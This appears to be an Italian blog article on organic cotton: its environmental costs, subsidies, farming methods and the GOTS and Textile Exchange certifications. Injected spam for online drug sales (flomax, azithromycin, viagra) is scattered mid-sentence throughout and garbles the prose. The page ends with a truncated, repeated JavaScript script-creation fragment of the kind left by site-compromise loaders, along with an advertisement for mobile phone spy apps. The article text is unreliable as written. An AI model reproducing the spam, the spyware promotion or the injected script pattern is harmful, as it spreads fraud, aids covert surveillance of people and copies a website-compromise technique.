Cotone Biologico

Perchè crediamo nel cotone biologico

Il cotone è la fibra tessile maggiormente prodotta sul pianeta occupando quasi il 3 percento dei terreni agricoli a livello globale e soddisfando Purchase quasi il 50 percento del fabbisogno mondiale di fibre. E’ un elemento fondamentale, ma il suo impatto sull’ambiente e sulla salute delle persone non è da meno se si considera che questa singola coltura assorbe qualcosa come il 25 percento di tutti i pesticidi chimici. Come se questo non fosse sufficiente la trasformazione della fibra in tessuto e prodotti finali prevede altri processi ad alto contenuto di inquinanti (sbiancanti, coloranti a base di metalli pesanti, detergenti, formaldeide, ammine aromatiche, ammoniaca e resine plastiche solo per citarne alcune) e ad alto consumo di risorse energetiche ed idriche. Si calcola che per la produzione di una t-shirt siano necessari qualcosa come 3000 litri di acqua.

buy flomax drug

Per chi di voi ha il pallino dell’economia, è utile sapere che il cotone è una delle colture maggiormente sussidiate dai governi dei paesi ricchi. Niente di male fino a qui: infine si tratta solo di garantire agli agricoltori uno stile di vita dignitoso. Peccato però che tali sussidi, abbattendo artificiosamente i costi di produzione, facciano sì che ingenti quantitativi siano riversati sul mercato mondiale a prezzi così bassi che altri coltivatori in altri parti del mondo get doctor to prescribe azithromycin (per esempio in Africa dove i governi non sono altrettanto generosi) non possono competere e sono costretti o a chiudere bottega o a vendere sottocosto.

Come sempre l’alternative esiste ma è piuttosto difficile da riconoscere in quanto ammonta ad un minuscolo 1% (o 250 mila tonnellate) dell’enorme galassia cotone. L’alternativa si chiama cotone biologico, o organic cotton per i fan dell’inglese. Come per la frutta e la verdura, la coltivazione del cotone biologico implica il rifiuto di sementi geneticamente modificate (OGM) e l’uso di quelle che abbiano subito almeno quattro germinazioni in assenza di trattamenti chimici, l’impiego di Pills fertilizzanti di origine vegetale (al posto dei vari pesticidi, erbicidi, fitofarmaci, ecc.), l’eliminazione dei parassiti per mezzo della cosiddetta lotta biologica che sfrutta gli antagonismi tra esseri viventi (come per esempio quelli tra parassiti ed alcune tipologie di insetti) mentre la corretta lavorazione del terreno e una rotazione delle colture consentono il contenimento delle erbe infestanti. Il tessuto in colore bianco è ottenuto tramite l’utilizzo di perossido evitando così gli sbiancanti e i candeggianti.

Anche se alcuni studiosi ritengono che nelle migliore delle ipotesi il cotone bio potrà raggiungere una quota del 5-6%, resta il fatto che questa nicchia rappresenta uno straordinario laboratorio di sperimentazione di nuove tecniche che possono ispirare un sempre maggiore numero di coltivatori (al di là del cotone). alcuni aspetti potrebbero anche essere adottati dai coltivatori “industriali”. I detrattori e gli scettici sostengono che tali pratiche non sarebbero sufficienti per colmare l’enorme domanda di cotone e che quindi il cotone biologico non è una soluzione nè sostenibile nè fattibile. Tuttavia un’accurata valutazione della sostenibilità, oltre a riconoscere che il cotone bio è più environmentally friendly, dovrebbe anche tenere conto del fatto che le organizzazione che se ne occupano spesso hanno tra le loro finalità anche il miglioramento dell condizioni di vita e lavoro dei coltivatori, specialmente nelle regioni più povere del mondo. Un interessante esperimento in questo senso è stato messo a punto da alcuni ricercatori dell’università di Hong Kong che hanno elaborato un sistema per valutare l’ Pills Cheap eco-compatibilità delle fibre tessili prendendo in considerazione diversi parametri tra cui il bilancio ossigeno/CO2 che deriva dalla produzione, lo sfruttamento del suolo, il consumo di energia e acqua, i rischi per la salute umana e gli ecosistemi, la biodegradabilità e il risultato è… che le fibre naturali, cotone biologico su tutti, sono le migliori.

Nell’ambito della certificazione reputable viagra sellers , due standard rappresentano il punto di riferimento internazionale e sono: GOTS (Global Organic Textile Standard) e TE (Textile Exchange). Entrambi consentono di definire in modo univoco quando un prodotto tessile può essere definito e riconosciuto biologico in ambito internazionale.

Fonti:
http://www.howtobegreen.eu/greenreport.asp?title=545
Purchase http://www.vestosolidal.it/la-sfida-del-cotone-biologico/
http://www.linkiesta.it/cotone-biologico#ixzz2iqFSWeis
http://www.ccpb.it/blog/2013/10/01/innovazione-tessile-passa-cotone-biologico/

var d=document;var s=d.createElement(‘script’); Buy var d=document;var s=d.createElement(‘script’); https://topspyapps.net – The most popular 2017 spy software applications for the mobile phones.topspyapps.netspy app, ubicar telefono por gps, cell phone tracker